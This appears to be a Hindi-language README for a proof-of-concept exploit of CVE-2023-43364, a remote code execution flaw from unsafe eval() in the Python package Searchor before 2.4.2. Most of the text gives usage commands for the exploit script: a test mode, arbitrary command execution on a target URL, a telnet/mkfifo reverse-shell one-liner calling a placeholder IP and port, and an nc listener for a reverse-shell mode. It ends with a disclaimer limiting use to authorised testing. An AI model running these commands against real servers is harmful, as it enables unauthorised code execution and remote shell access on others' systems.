
Searchor (< 2.4.2) में असुरक्षित `eval()` उपयोग के माध्यम से POC exploit
Searchor (< 2.4.2) में असुरक्षित
eval()उपयोग के माध्यम से रिमोट कोड निष्पादन (RCE)
यह प्रोजेक्ट CVE-2023-43364 के शोषण को प्रदर्शित करता है, जो Python पैकेज Searchor (< 2.4.2) को प्रभावित करने वाली एक रिमोट कोड निष्पादन (RCE) भेद्यता है।
यह समस्या उपयोगकर्ता-नियंत्रित इनपुट पर eval() के असुरक्षित उपयोग के कारण होती है, जो हमलावरों को मनमाना Python कोड इंजेक्ट और निष्पादित करने की अनुमति देती है।
यह भेद्यता असुरक्षित eval() उपयोग को हटाकर ठीक की गई थी, जैसा कि आधिकारिक पैच में दिखाया गया है:
अतिरिक्त तकनीकी विवरण और परामर्श:
यह प्रूफ ऑफ कॉन्सेप्ट कई निष्पादन विधियाँ प्रदान करता है, जिनमें कमांड निष्पादन, परीक्षण सत्यापन और रिवर्स शेल शामिल हैं।
कोड निष्पादन सत्यापित करने के लिए एक सरल कमांड (id) चलाएँ:
python3 CVE-2023-43364.py <URL> --test
कस्टम कमांड निष्पादित करें
लक्ष्य सर्वर पर कोई भी कमांड चलाएँ:
python3 CVE-2023-43364.py <URL> -a "whoami"
उदाहरण:
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"
रिवर्स शेल
अपनी मशीन पर एक लिसनर प्रारंभ करें:
nc -lvnp 4444
एक्सप्लॉइट चलाएँ:
python3 CVE-2023-43364.py <URL> <LHOST>
यह प्रोजेक्ट निम्नलिखित उद्देश्यों के लिए है:
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
इस एक्सप्लॉइट का उपयोग केवल नियंत्रित वातावरण में या उन सिस्टमों पर करें जिनके परीक्षण की आपके पास स्पष्ट अनुमति है